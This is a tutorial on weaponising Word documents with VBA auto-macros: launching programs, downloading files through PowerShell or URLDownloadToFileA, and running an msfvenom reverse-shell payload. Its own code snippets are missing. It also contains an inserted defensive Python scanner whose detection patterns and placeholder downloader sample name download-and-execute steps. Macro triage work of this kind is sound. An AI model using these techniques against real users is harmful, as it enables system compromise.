Malicious office documents are one of the main attack vectors for attackers trying to compromise a system.
There are two main methods to create a malicious Word document:
- CVE-based.
- Functionality-based.
Both methods have their pros and cons, but the main problem with the CVE-based approach is that it usually requires a specific version of the software to be in use on the target. In practice the exact version of the installed software is not always known, so a CVE-based approach can lead to a failed attack attempt.
On the other hand, the functionality-based approach, as the name suggests, uses functionality that is part of the software itself (Microsoft Word, in our case) and can be executed successfully on all versions of the software.
This article discusses the functionality-based approach, with the main focus on macros.
Opening a calculator using a macro
First, a macro that launches the calculator when the document is opened will be created. To create a macro:
- Open a Word document.
- Click “View” -> “Macros”.
- Enter a name for a new macro.
After these steps, a new window opens with an empty function template. Replace it with the following code:
The macro, like most macros for Microsoft Office, is written in VBA (Visual Basic for Applications). So how does the macro work?
“Sub” and “End Sub” start and end the function declaration respectively.
“AutoOpen” is one of the auto macros recognized by Microsoft Word; it is executed each time the document is opened.
The “Shell” function runs an executable program. In this case it is used to execute “calc.exe”.
Save the macro and the document. Now the macro is executed whenever the document is opened.
Downloading a file using a macro
Going one step further, a macro that downloads a file from a hosted server when the document is opened will be created. The following VBA code is used for this purpose:
As can be seen from the code snippet, PowerShell commands can also be used in macros. This macro downloads a text file from a server and saves it on the target computer when the document is opened.
Download and execute a payload using a macro
Usually, the main purpose of sending a malicious Word document is to download a payload onto the target computer. msfvenom was used to create a payload that opens a reverse shell connection:
The file was then hosted on a server.
When writing a VBA script it is also possible to use WinAPI calls and Windows libraries in the macro:
First, the “URLDownloadToFileA” function, imported from the “urlmon” library, is declared. It is then used in the “DownloadFile” function to download the malicious payload from the server. “AutoOpen” then calls it to download the file and execute it.
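From the defender's side, the three macro patterns described above (an auto-execution entry point, a Shell call, a PowerShell command, and a WinAPI download via a Declare statement) are exactly the indicators an analyst looks for when triaging a suspicious document. The following Python script is an added example and not code from the original article: it scans extracted VBA source text for those indicators and assigns a coarse verdict. The VBA samples are constructed for this example and deliberately non-functional (placeholders instead of real URLs and paths); in a real workflow the macro text would come from a VBA extraction tool such as olevba from oletools, which is an assumption about the workflow rather than part of the article.

```python
"""Keyword-based triage of VBA macro source for the macro techniques discussed above.

Added example (not from the original article). Given the VBA text extracted from a
document, report which risky indicators are present so an analyst can prioritise it.
"""
import re
from dataclasses import dataclass, field

# Each rule is (category, regex). The patterns mirror the techniques the article
# walks through: auto macros, Shell, PowerShell, URLDownloadToFile, Declare/Lib.
# These are triage heuristics, not proof of malice; a legitimate macro may match.
RULES = [
    ("autoexec", re.compile(r"\bSub\s+(AutoOpen|AutoExec|AutoClose|Document_Open)\b", re.I)),
    ("exec", re.compile(r"\bShell\b", re.I)),                       # Shell "..." or WScript.Shell
    ("powershell", re.compile(r"\bpowershell\b", re.I)),
    ("download", re.compile(r"URLDownloadToFile[AW]?\b", re.I)),
    ("download", re.compile(r"Net\.WebClient|DownloadString", re.I)),
    ("winapi", re.compile(r"\bDeclare\s+(PtrSafe\s+)?Function\b.*\bLib\s+\"", re.I)),
]


@dataclass
class ScanResult:
    categories: set = field(default_factory=set)
    hits: list = field(default_factory=list)  # (category, line number, stripped line)

    @property
    def verdict(self) -> str:
        """High when an auto macro is combined with execution or download capability."""
        c = self.categories
        if "autoexec" in c and c & {"exec", "download", "powershell", "winapi"}:
            return "high"
        if c:
            return "medium"
        return "low"


def scan_vba(source: str) -> ScanResult:
    """Run every rule over each non-comment line of the VBA source."""
    result = ScanResult()
    for number, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("'"):  # VBA comment: skip to reduce noise
            continue
        for category, pattern in RULES:
            if pattern.search(line):
                result.categories.add(category)
                result.hits.append((category, number, stripped))
    return result


# Constructed samples. None of these is a working macro: the "hostile" ones use
# placeholder URLs and paths and leave the actual logic out.
BENIGN = """
Sub FormatHeadings()
    ' Constructed benign macro: applies a style to the first paragraph
    ActiveDocument.Paragraphs(1).Style = "Heading 1"
End Sub
"""

CALC = """
' Constructed sample of the first macro type in the article
Sub AutoOpen()
    Shell "calc.exe"
End Sub
"""

DOWNLOADER = """
' Constructed sample of the WinAPI-based macro type; arguments are placeholders
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (...) As Long

Sub AutoOpen()
    DownloadFile
End Sub

Sub DownloadFile()
    ' download to a placeholder path, then launch it (details omitted in this sample)
    URLDownloadToFileA 0, "http://<server-placeholder>/<file>", "<local-path>", 0, 0
    Shell "<local-path>"
End Sub
"""

if __name__ == "__main__":
    for name, src in [("benign", BENIGN), ("calc", CALC), ("downloader", DOWNLOADER)]:
        r = scan_vba(src)
        print(f"{name}: {r.verdict} {sorted(r.categories)}")
        for cat, number, text in r.hits:
            print(f"  [{cat}] line {number}: {text}")
```

The verdict is intentionally coarse: the combination of an auto macro with anything that launches a process or fetches content is what distinguishes the documents described in this article from ordinary formatting macros, so that pairing is what drives the "high" rating; single indicators only raise the file to "medium" for a human look.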
When the document is opened, the file is downloaded:
And executed:
References
https://docs.microsoft.com/en-us/office/vba/word/concepts/customizing-word/auto-macros
https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/shell-function